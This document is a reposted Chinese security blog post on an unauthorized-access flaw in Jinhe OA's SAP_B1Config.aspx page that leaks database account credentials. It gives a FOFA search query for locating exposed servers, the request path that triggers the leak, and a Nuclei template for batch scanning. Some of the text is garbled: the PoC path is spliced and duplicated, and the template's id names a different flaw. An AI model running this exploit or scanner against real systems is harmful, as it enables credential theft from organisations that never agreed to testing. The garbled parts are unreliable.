金和OA SAP_B1Config.aspx未授权访问漏洞

admin 2024年1月12日14:40:57评论40 views字数 942阅读3分8秒阅读模式

金和OA SAP_B1Config.aspx未授权访问漏洞

金和OA SAP_B1Config.aspx未授权访问漏洞
金和OA SAP_B1Config.aspx未授权访问漏洞

漏洞简介

金和OA SAP_B1Config.aspx未授权访问漏洞

金和QA办公系统是.款集合了办公自动化协同办公工作流管理等功能的企业级管理软件。金和OA办公系统提供了多个模块,包括日程管理、文件管理、邮件管理、人事管理、客户管理、项目管理等。用户可以根据自己的需求选择需要的模块进行使用。该系统存在未授权访问漏洞,攻击者可通过此漏洞获取数据库的账户密码等敏感信息。

金和OA SAP_B1Config.aspx未授权访问漏洞
金和OA SAP_B1Config.aspx未授权访问漏洞

漏洞复现

金和OA SAP_B1Config.aspx未授权访问漏洞

第一步、使用下面fofa语句进行资产收集...确认测试目标

fofa语句app="金和网络-金和OA"

第二步、登陆页面如下

金和OA SAP_B1Config.aspx未授权访问漏洞

第三步、漏洞利用,使用poc进行拼接URL访问,可查看到泄露的数据库账号跟密码

/C6/JHsoft./C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1CostEAI/SAP_B1Config.aspx/?manage=1

金和OA SAP_B1Config.aspx未授权访问漏洞

金和OA SAP_B1Config.aspx未授权访问漏洞
金和OA SAP_B1Config.aspx未授权访问漏洞

批量脚本

金和OA SAP_B1Config.aspx未授权访问漏洞
id: jinhe-jc6-ntko-upload-fileuploadinfo:  name: jinhe-jc6-ntko-upload-fileupload  author: nihao  severity: high  description: |  metadata:    fofa-query: app="金和网络-金和OA"http:  - raw:      - |        GET /C6/JHsoft.CostEAI/SAP_B1Config.aspx/?manage=1 HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3        Accept-Encoding: gzip, deflate        DNT: 1        Connection: close        Upgrade-Insecure-Requests: 1    matchers:      - type: status        status:          - 200

原文始发于微信公众号(揽月安全团队):金和OA SAP_B1Config.aspx未授权访问漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月12日14:40:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   金和OA SAP_B1Config.aspx未授权访问漏洞http://cn-sec.com/archives/2385220.html

发表评论

匿名网友 填写信息